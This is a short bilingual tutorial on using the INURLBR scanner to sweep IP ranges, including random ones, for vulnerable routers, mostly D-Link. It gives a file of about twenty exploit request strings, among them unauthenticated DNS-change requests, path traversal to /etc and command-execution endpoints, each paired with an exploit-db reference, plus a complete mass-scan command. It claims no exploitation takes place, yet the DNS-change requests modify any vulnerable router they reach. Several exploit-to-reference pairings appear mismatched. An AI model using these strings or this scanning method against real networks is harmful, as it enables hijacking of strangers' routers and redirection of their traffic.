In this short article we will use the INURLBR tool for searching routers in certain ip ranges.
The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.
Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.
We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let's just filtering routers.
Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.
File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi
Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.
Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.
Example:
http://TARGET/{STRING_SUB_PROCESS}
http://TARGET/{STRING_SUB_PROCESS}
http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?
http://200.16.3.***/tools_admin.asp
If the HTTP server return code 200 means that such a request has been successfully performed.
Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.
if(HTTP_CODE == 200){
VULN
}
Now let's create our command to run the tool INURLBR.
By setting command:
SET RANGE IP:
RANGE IP:
RANGE IP:
--range Set range IP.
Example: --range {range_start,rage_end}
Usage: --range '172.16.0.5,172.16.0.255'
OR
RANGE IP RANDOM:
--range-rand Set amount of random ips.
Example: --range-rand {rand}
Usage: --range-rand '50'
SET FILE OUTPUT:
-s vuln.txt
SET FILE SUB_PROCESS:
--sub-file Subprocess performs an injection
strings in URLs found by the engine, via GET or POST.
Example: --sub-file {youfile}
Usage: --sub-file exploits_get.txt
SET TYPE OF REQUEST - SUB_PROCESS:
--sub-get defines whether the strings coming from
--sub-file will be injected via GET.
Usage: --sub-get
SET VALIDATION HTTP CODE:
--ifcode Valid results based on your return http code.
Example: --ifcode {ifcode}
Usage: --ifcode 200
SET TIME-OUT:
--time-out Timeout to exit the process.
Example: --time-out {second}
Usage: --time-out 3
COMPLETE COMMAND:
php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200
print output:
Strings exploits used:
All exploits cited already have packages fix.
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/
Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/
Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/
Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/
Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/
Exploit_model: D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/
Exploit_model: D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/
Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/
Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/
Exploit_model: D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/
Exploit_model: D-Link AP 3200 - Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/
Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/
Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/
Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/
Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/
Exploit_model: D-Link DSL-2750B ADSL Router - CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/
Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/
Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/
Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/
Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/
Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/
Exploit_model: D-Link DIR-645 1.03B08 - Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/
